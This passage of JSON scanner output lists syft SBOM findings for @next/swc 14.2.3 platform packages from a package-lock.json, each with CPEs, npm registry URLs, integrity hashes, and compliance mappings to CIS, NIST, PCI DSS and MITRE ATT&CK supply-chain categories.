"cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_arm64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-linux-arm64-gnu@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-gnu/-/swc-linux-arm64-gnu-14.2.3.tgz", "integrity": "sha512-cuzCE/1G0ZSnTAHJPUT1rPgQx1w5tzSX7POXSLaS7w2nIUJUD+e25QoXD/hMfxbsT9rslEXugWypJMILBj/QsA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "27ac7498beafdc1b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-linux-arm64-musl 14.2.3", "title": "@next/swc-linux-arm64-musl 14.2.3", "description": "Package discovered: @next/swc-linux-arm64-musl 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f485e6463dfab8af", "name": "@next/swc-linux-arm64-musl", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-musl:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64-musl:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_musl:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64_musl:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-arm64:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_arm64:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-arm64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_arm64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-linux-arm64-musl@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-linux-arm64-musl/-/swc-linux-arm64-musl-14.2.3.tgz", "integrity": "sha512-0D4/oMM2Y9Ta3nGuCcQN8jjJjmDPYpHX9OJzqk42NZGJocU2MqhBq5tWkJrUQOQY9N+In9xOdymzapM09GeiZw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "6ebdba72ca21b201", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-linux-x64-gnu 14.2.3", "title": "@next/swc-linux-x64-gnu 14.2.3", "description": "Package discovered: @next/swc-linux-x64-gnu 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "1a0b07449dd69139", "name": "@next/swc-linux-x64-gnu", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-gnu:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-gnu:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_gnu:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_gnu:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-x64-gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_x64_gnu:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-linux-x64-gnu@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-gnu/-/swc-linux-x64-gnu-14.2.3.tgz", "integrity": "sha512-ENPiNnBNDInBLyUU5ii8PMQh+4XLr4pG51tOp6aJ9xqFQ2iRI6IH0Ds2yJkAzNV1CfyagcyzPfROMViS2wOZ9w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "dc907ac1b205061b", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-linux-x64-musl 14.2.3", "title": "@next/swc-linux-x64-musl 14.2.3", "description": "Package discovered: @next/swc-linux-x64-musl 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2ac68dfe221aa840", "name": "@next/swc-linux-x64-musl", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-musl:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64-musl:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_musl:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64_musl:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux-x64:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux_x64:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-linux:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_linux:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-linux-x64-musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_linux_x64_musl:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-linux-x64-musl@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-linux-x64-musl/-/swc-linux-x64-musl-14.2.3.tgz", "integrity": "sha512-BTAbq0LnCbF5MtoM7I/9UeUu/8ZBY0i8SFjUMCbPDOLv+un67e2JgyN4pmgfXBwy/I+RHu8q+k+MCkDN6P9ViQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "1f0b6c5423b99cbb", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-win32-arm64-msvc 14.2.3", "title": "@next/swc-win32-arm64-msvc 14.2.3", "description": "Package discovered: @next/swc-win32-arm64-msvc 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "f14dd9ed0ebaa5a4", "name": "@next/swc-win32-arm64-msvc", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64-msvc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64-msvc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64_msvc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64_msvc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-arm64:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_arm64:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-arm64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_arm64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-win32-arm64-msvc@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-win32-arm64-msvc/-/swc-win32-arm64-msvc-14.2.3.tgz", "integrity": "sha512-AEHIw/dhAMLNFJFJIJIyOFDzrzI5bAjI9J26gbO5xhAKHYTZ9Or04BesFPXiAYXDNdrwTP2dQceYA4dL1geu8A==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "de3c183aece29806", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-win32-ia32-msvc 14.2.3", "title": "@next/swc-win32-ia32-msvc 14.2.3", "description": "Package discovered: @next/swc-win32-ia32-msvc 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0272e47fa12e3e5d", "name": "@next/swc-win32-ia32-msvc", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32-msvc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32-msvc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32_msvc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32_msvc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-ia32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_ia32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc:\\@next\\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@next/swc-win32-ia32-msvc/-/swc-win32-ia32-msvc-14.2.3.tgz", "integrity": "sha512-vga40n1q6aYb0CLrM+eEmisfKCR45ixQYXuBXxOOmmoV8sYST9k7E3US32FsY+CkkF7NtzdcebiFT4CHuMSyZw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "42051f1b01ab97d3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @next/swc-win32-x64-msvc 14.2.3", "title": "@next/swc-win32-x64-msvc 14.2.3", "description": "Package discovered: @next/swc-win32-x64-msvc 14.2.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "3812cfa26422b0fa", "name": "@next/swc-win32-x64-msvc", "version": "14.2.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-x64-msvc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc-win32-x64-msvc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64_msvc:\\@next\\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@next\\/swc_win32_x64_msvc:\\@next\\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": 